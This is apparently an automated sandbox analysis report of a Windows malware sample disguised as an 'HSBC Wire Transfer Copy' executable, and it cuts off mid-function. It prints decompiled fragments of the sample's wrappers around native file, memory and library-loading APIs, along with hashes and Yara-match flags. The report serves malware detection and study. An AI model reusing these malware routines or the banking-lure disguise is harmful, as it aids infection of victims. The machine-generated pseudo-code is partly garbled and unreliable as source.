                      • Instruction ID: 0782a66ea4f7cdb8dc6232f035b129e1c9e9411d42653e26f1170f7aaa36d0d6
                      • Opcode Fuzzy Hash: 4ee13576ea16f0f34b454cf8c872275f92f8b9e0e70a5554f88d0245c8226652
                      • Instruction Fuzzy Hash: AB117CB4A003498FDF60CFAAD5497DEBBF4FB89329F108429D805A3601D779A944CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Analysis Process: HSBC ... Wire Transfer Copy.exe PID: 7164 Parent PID: 6892 HSBC ... Wire Transfer Copy.exeCOMMON

                      Executed Functions

                      Function 0041A410, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 37%
                      			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                      0x0041a413
                      0x0041a41f
                      0x0041a427
                      0x0041a42c
                      0x0041a432
                      0x0041a44d
                      0x0041a455
                      0x0041a459

                      APIs
                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID: 1JA$rMA$rMA
                      • API String ID: 2738559852-782607585
                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                      • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                      • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A3B2, Relevance: 1.6, APIs: 1, Instructions: 73filenativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: ad7a2b69c23d8c87a9f3000123ea59aa2bef7613659c0c02c8a21a222789760a
                      • Instruction ID: 5f4264bd310aba6d53aa1ebb4fc90f0fdf7fc59ea5c3541b9fb3111a50711025
                      • Opcode Fuzzy Hash: ad7a2b69c23d8c87a9f3000123ea59aa2bef7613659c0c02c8a21a222789760a
                      • Instruction Fuzzy Hash: 8411D4B2204108AFDB08CF99EC81EEB77ADEF8C754B158649FA1DD3240C630EC518BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0040ACF0(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                      0x0040ad0c
                      0x0040ad0f
                      0x0040ad14
                      0x0040ad19
                      0x0040ad23
                      0x0040ad28
                      0x0040ad2b
                      0x0040ad2d
                      0x0040ad35
                      0x0040ad3a
                      0x0040ad3a
                      0x0040ad41
                      0x0040ad49
                      0x0040ad4c
                      0x0040ad4e
                      0x0040ad62
                      0x00000000
                      0x0040ad64
                      0x0040ad6a
                      0x0040ad1e
                      0x0040ad1e
                      0x0040ad1e

                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A35A, Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 79%
                      			E0041A35A(void* __ecx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t21;
				void* _t34;

				asm("sbb dl, [ebp-0x75]");
				_t15 = _v0;
				_t3 = _t15 + 0xc40; // 0xc40
				E0041AF60(_t34, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t21;
			}






                      0x0041a35f
                      0x0041a363
                      0x0041a36f
                      0x0041a377
                      0x0041a3ad
                      0x0041a3b1

                      APIs
                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 1cd9c65bb27f183f89a46229e2e1a735b4de4fd3e7bb8d00e906766b24bafcb3
                      • Instruction ID: 8b67ffc8b34fb7d680d2891edcba8a278bfb604c463cdfcb4a44eb0438df59d2
                      • Opcode Fuzzy Hash: 1cd9c65bb27f183f89a46229e2e1a735b4de4fd3e7bb8d00e906766b24bafcb3
                      • Instruction Fuzzy Hash: 5B01F2B2201108BFCB08CF98DC81EEB37A9AF8C754F158248FA1DE3241C630E811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A360, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                      0x0041a36f
                      0x0041a377
                      0x0041a3ad
                      0x0041a3b1

                      APIs
                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                      • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                      • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                      0x0041a54f
                      0x0041a557
                      0x0041a579
                      0x0041a57d

                      APIs
                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID:
                      • API String ID: 2167126740-0
                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                      • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                      • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                      0x0041a493
                      0x0041a496
                      0x0041a49f
                      0x0041a4a7
                      0x0041a4b5
                      0x0041a4b9

                      APIs
                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                      • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                      • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 4695e64c2c40e64619faac65e399cb0999a84b4dbd0868e7d5dbe03ab1075378
                      • Instruction ID: 5e08d7068ea4aa736484ed1a64031c44616ca963b12c76e80819ac585f736545
                      • Opcode Fuzzy Hash: 4695e64c2c40e64619faac65e399cb0999a84b4dbd0868e7d5dbe03ab1075378
                      • Instruction Fuzzy Hash: FA9002B120100402E140759948057470109ABD0341F51C411A5055554EC6998DD576A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 7260c4e954a2a5acae82a67e0e12353f0d1008f1db04e5cfbcbe6d81f96ecd09
                      • Instruction ID: 6eacbef5086a18f167f80593dbe9a18137ac7f069bc6d9a28ff37751df4708f2
                      • Opcode Fuzzy Hash: 7260c4e954a2a5acae82a67e0e12353f0d1008f1db04e5cfbcbe6d81f96ecd09
                      • Instruction Fuzzy Hash: DA9002A134100442E10065994815B070109EBE1341F51C415E1055554DC659CC527166
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 1cc4e7fa23f13f29dfa7427ea5f49eb9407d003dcd4fff3ebdf49267cfbbc0d5
                      • Instruction ID: 6d58a2faf690b2989f720c3154e63c4898615998eba9e71d497f2280cda6e71f
                      • Opcode Fuzzy Hash: 1cc4e7fa23f13f29dfa7427ea5f49eb9407d003dcd4fff3ebdf49267cfbbc0d5
                      • Instruction Fuzzy Hash: 3390027120100413E11165994905707010DABD0281F91C812A0415558DD6968952B161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 4af5785f29226946f3b7a489ad4a1f23ae585ed9f1c255de1f15264e59ba3217
                      • Instruction ID: b68d2debb647f9d3a2089aa0b30902935a67335c972d18a668a28cd20ea23695
                      • Opcode Fuzzy Hash: 4af5785f29226946f3b7a489ad4a1f23ae585ed9f1c255de1f15264e59ba3217
                      • Instruction Fuzzy Hash: B2900261242041526545B5994805507410ABBE0281791C412A1405950CC5669856E661
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016698F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 48badcf748ca49d06d0e7aa895d33ca5eb0532989f595718192ed089913d99b2
                      • Instruction ID: 3d242d129301b9cf52e0b88dc5a26ffb651051505f9672a92d9d3fe49b8404a7
                      • Opcode Fuzzy Hash: 48badcf748ca49d06d0e7aa895d33ca5eb0532989f595718192ed089913d99b2
                      • Instruction Fuzzy Hash: F590026160100502E10175994805617010EABD0281F91C422A1015555ECA658992B171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 45b24b4ed35f735f6490af5e80f51d9536933a5c7bdd558a6a2e4f40577847c1
                      • Instruction ID: 3b886fe7c749730ecd9488da7dc858d6f001c54f6af8667746315c7b95d160bb
                      • Opcode Fuzzy Hash: 45b24b4ed35f735f6490af5e80f51d9536933a5c7bdd558a6a2e4f40577847c1
                      • Instruction Fuzzy Hash: FB90026121180042E20069A94C15B070109ABD0343F51C515A0145554CC95588616561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 425b57803654045e84b56c55b0c98d228fd7d84051e4ca081c9419ddd64bab02
                      • Instruction ID: b2ac5fa06f7b5ee6c9acd390625d5adb19b00781b49473fb268f6db86531285b
                      • Opcode Fuzzy Hash: 425b57803654045e84b56c55b0c98d228fd7d84051e4ca081c9419ddd64bab02
                      • Instruction Fuzzy Hash: 8190026160100042514075A98C459074109BFE1251751C521A0989550DC599886566A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: e7fb41b680768ac571e418549dd0b5029131d5a3f2251bfafb055618dfc8b0a9
                      • Instruction ID: 91dc3d55fdf9489e285e492b3c6edf992ee60e47f6ed2f0700432001ffad95b0
                      • Opcode Fuzzy Hash: e7fb41b680768ac571e418549dd0b5029131d5a3f2251bfafb055618dfc8b0a9
                      • Instruction Fuzzy Hash: C990027120140402E10065994C1570B0109ABD0342F51C411A1155555DC665885175B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 54a120b450a6b574131af2247711ba8d09d09c4c9836f1c7cf8f28c7aaa57dc0
                      • Instruction ID: 97381257ac39b6d704c1a615b256c7a249c93cfa87fd4f0a4c2cb1f5de2209ff
                      • Opcode Fuzzy Hash: 54a120b450a6b574131af2247711ba8d09d09c4c9836f1c7cf8f28c7aaa57dc0
                      • Instruction Fuzzy Hash: 16900265211000031105A9990B05507014AABD5391351C421F1006550CD66188616161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 2d5ade9b71c17b032e5501165f43fca07027ec6a390432d06e56b991e576bdf6
                      • Instruction ID: f83788d181a51b1010d40679d5a747e47d3e66a8c39561165d302fc641f72541
                      • Opcode Fuzzy Hash: 2d5ade9b71c17b032e5501165f43fca07027ec6a390432d06e56b991e576bdf6
                      • Instruction Fuzzy Hash: F39002A120200003510575994815617410EABE0241B51C421E1005590DC56588917165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a1b0e108146eb88b9cb0b001e753ee3ded0e46e90ede6ff8123b4d84462afda8
                      • Instruction ID: d9ce8fed38ad710fa411acb87931bc596137d1e543f2dbe46f914f0a6384093f
                      • Opcode Fuzzy Hash: a1b0e108146eb88b9cb0b001e753ee3ded0e46e90ede6ff8123b4d84462afda8
                      • Instruction Fuzzy Hash: BC90027120100402E10069D958096470109ABE0341F51D411A5015555EC6A588917171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016697A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 1ebcd834e7331a3e470be0593bd031cef48be1e5758ad5a1d7beb91406beb646
                      • Instruction ID: f4d70074179660d00a780723423afb42a9c78ae94439a09da750f5ed3c2e1313
                      • Opcode Fuzzy Hash: 1ebcd834e7331a3e470be0593bd031cef48be1e5758ad5a1d7beb91406beb646
                      • Instruction Fuzzy Hash: 6590026130100003E140759958196074109FBE1341F51D411E0405554CD95588566262
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 3726c4443f82630d7941897cb1b25cd0948b5cdf3fb264c95039442da0ea36b9
                      • Instruction ID: 6024f3bb3764a7275f690d78e5c990575fd7dd9941186ef6a3d9cfaf24140d0a
                      • Opcode Fuzzy Hash: 3726c4443f82630d7941897cb1b25cd0948b5cdf3fb264c95039442da0ea36b9
                      • Instruction Fuzzy Hash: FF90026921300002E1807599580960B0109ABD1242F91D815A0006558CC95588696361
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01669660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 7c053d0607ce535d3b7aa0bc93dbb6a0b66d85357260057cd22388b5ec1b2fbc
                      • Instruction ID: 005c10d7e018414e348443fc90b590a7bc4ade48a797e3477f45d43931b337f0
                      • Opcode Fuzzy Hash: 7c053d0607ce535d3b7aa0bc93dbb6a0b66d85357260057cd22388b5ec1b2fbc
                      • Instruction Fuzzy Hash: 2490027120100802E1807599480564B0109ABD1341F91C415A0016654DCA558A5977E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: b89755669673f18c9e163e68eb869f9203f9d089a38bf6c8c26eb9347e27d638
                      • Instruction ID: 63e6a4c36fa03743358e5b7162632170ffedb0f7bf3282dcd066677c04f19ce1
                      • Opcode Fuzzy Hash: b89755669673f18c9e163e68eb869f9203f9d089a38bf6c8c26eb9347e27d638
                      • Instruction Fuzzy Hash: 4490027120108802E1106599880574B0109ABD0341F55C811A4415658DC6D588917161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                      • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                      • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                      • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                      0x0041a647
                      0x0041a652
                      0x0041a65d
                      0x0041a661

                      APIs
                      • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: 6EA
                      • API String ID: 1279760036-1400015478
                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                      • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                      • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00408393, Relevance: 1.7, APIs: 1, Instructions: 194threadwindowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 65%
                      			E00408393(void* __eflags, intOrPtr _a8, long _a12, char* _a16, int _a20, intOrPtr _a57327693) {
				char* _v4;
				char* _v8;
				char _v64;
				char* _v132;
				char* _v136;
				char _v656;
				char* _v668;
				char _v680;
				char* _v684;
				char _v688;
				char* __ebx;
				intOrPtr __edi;
				int __esi;
				void* _t64;
				int _t65;
				void* _t68;
				void* _t69;
				void* _t72;
				long _t73;
				int _t77;
				void* _t79;

				_t85 = __eflags;
				asm("aad 0xc8");
				if(__eflags != 0) {
					_a57327693 = _a57327693 + _t69;
					_push(_t69);
					E0041CA00();
					_t64 = E0040ACF0(_t68, _t72, _t85, _a8 + 0x1c,  &_v64); // executed
					_t65 = E00414E50(_a8 + 0x1c, _t64, 0, 0, 0xc4e7b6d6);
					_t77 = _t65;
					if(_t77 != 0) {
						_push(_t72);
						_t73 = _a12;
						_t65 = PostThreadMessageW(_t73, 0x111, 0, 0); // executed
						_t87 = _t65;
						if(_t65 == 0) {
							_t65 =  *_t77(_t73, 0x8003, _t79 + (E0040A480(_t87, 1, 8) & 0x000000ff) - 0x40, _t65);
						}
					}
					return _t65;
				} else {
					asm("int 0x9a");
					_pop(ss);
					asm("cmpsd");
					__ebp = __ebp << 1;
					asm("adc eax, 0x8b5592bf");
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v4 = 0;
					_v684 = 0;
					 &_v680 = E0041BE60( &_v680, 0, 0x2a4);
					__esi = _a20;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a8;
					_push(__ecx);
					_push(__edi); // executed
					__eax = E00408310(__ebx, __ecx, __edi, __eflags); // executed
					__esp = __esp + 0x14;
					__eax = E0041B750(__ecx);
					_t16 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t16;
					_a20 = 0;
					while(1) {
						__eax = E0040F670(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
